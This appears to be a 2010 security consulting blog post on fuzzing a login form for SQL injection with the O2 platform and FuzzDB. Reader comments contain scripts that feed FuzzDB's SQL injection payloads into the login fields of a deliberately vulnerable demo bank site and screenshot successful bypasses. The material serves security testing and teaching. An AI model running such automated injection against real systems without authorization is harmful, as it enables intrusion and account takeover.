parsonsisconsulting

Parsons Software Security Consulting Blog

SQL injection with 02 and FuzzDB Database plugin

with 3 comments

O2 Database plugin testing for SQL injection.

Now that we have covered XSS with 02 we are going to go through SQL injection using FuzzDB.

Adam Muntner created it using a number of sources.

fuzzdb helps identify security flaws in applications by aggregating known attack patterns, predictable resource names, and server response messages to create a comprehensive, repeatable set of malformed input test cases.


svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only

http://code.google.com/p/fuzzdb/downloads/detail?name=fuzzdb-1.08.tgz 

This code uses the fuzzdb plugin and fuzz’s the database with different SQL injection payloads.   It then takes screen shots of each successful iteration.

The screen shots are above.   If you have any questions feel free to email me at mparsons1980@gmail.com

Once again Parsons Software Security Consulting, LLC is offering unauthenticated scans for the holidays.  A few people have taken me up on this offer.

http://player.vimeo.com/video/17196966

Written by mparsons1980

November 25, 2010 at 3:04 am

3 Responses

Subscribe to comments with RSS.

  1. It’s not clear what script did you use in this example. Could you post the script?

    Thiago Stuckert

    December 7, 2010 at 9:39 am

  2. it’s something like this?

    panel.clear();
    var ie = panel.add_IE().silent(true);

    //var tempFolder = “_altoro SQL Injection Tests”.tempDir(‘False’);
    var tempFolder = “_altoro SQL Injection Tests”;

    Action login =
    (username,password) => (
    ie.open(“http://demo.testfire.net/bank/login.aspx”);
    ie.field(“uid”).value(username);
    ie.field(“passw”).value(password);
    ie.button(“Login”).click();
    panel.screenshow().save(tempfolder pathCombine(username safepg));
    );

    var fuzzDb = new API_FuzzDB();

    var testCount = 0;
    var maxTests = -1; // make -1 to run all tests
    foreach(var payload in fuzzDb_payload_Sql_Generic())
    {
    if (((testCount++) >= maxTests && maxTests) >= -1)
    break;
    login(payload, “no password”);
    }
    return “There are {0} screenshots in the folder {1}”.format{ tempFolder.files(), tempFolder};

    //O2File:API_FuzzDB.cs
    //O2File:API_Cropper.cs
    //O2File:WatiN_IE_ExtensionMethods.cs
    //using O2.XRules.Database.Utils.O2
    //O2Ref:WatiN.Core.1x.dll

    Thiago Stuckert

    December 7, 2010 at 10:00 am

  3. I didn’t had seen the HD version of the video.
    I improved the script but I couldn’t do the parse to int in the final message.

    Follow the script:

    panel.clear();
    var ie = panel.add_IE().silent(true);
    ie.disableFlashing(); // use this when developing the script to make it faster

    var tempFolder = “_altoro SQL Injection Tests”.tempDir(false);

    Action login =
    (username,password) => {
    ie.open(“http://demo.testfire.net/bank/login.aspx”);
    ie.field(“uid”).value(username);
    ie.field(“passw”).value(password);
    ie.button(“Login”).click();
    if(ie.hasField(“GO”)) // has successful take a printscreen
    panel.screenshot().save(tempFolder.pathCombine(username.safeFileName()+”.jpg”));
    };

    var fuzzDb = new API_FuzzDB();

    var testCount = 0;
    var maxTests = 10000000;

    foreach(var payload in fuzzDb.payloads_SQLi_Generic())
    {
    testCount++;
    if(testCount>maxTests)
    break;

    login(payload,”foo”);
    }
    return “There are {0} screenshots in the folder {1}”.format(tempFolder.files(), tempFolder);

    //O2File:API_FuzzDB.cs
    //O2File:API_Cropper.cs
    //O2File:WatiN_IE_ExtensionMethods.cs
    //using O2.XRules.Database.Utils.O2
    //O2Ref:WatiN.Core.1x.dll

    Thiago Stuckert

    December 7, 2010 at 12:57 pm


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 245 other followers

%d bloggers like this: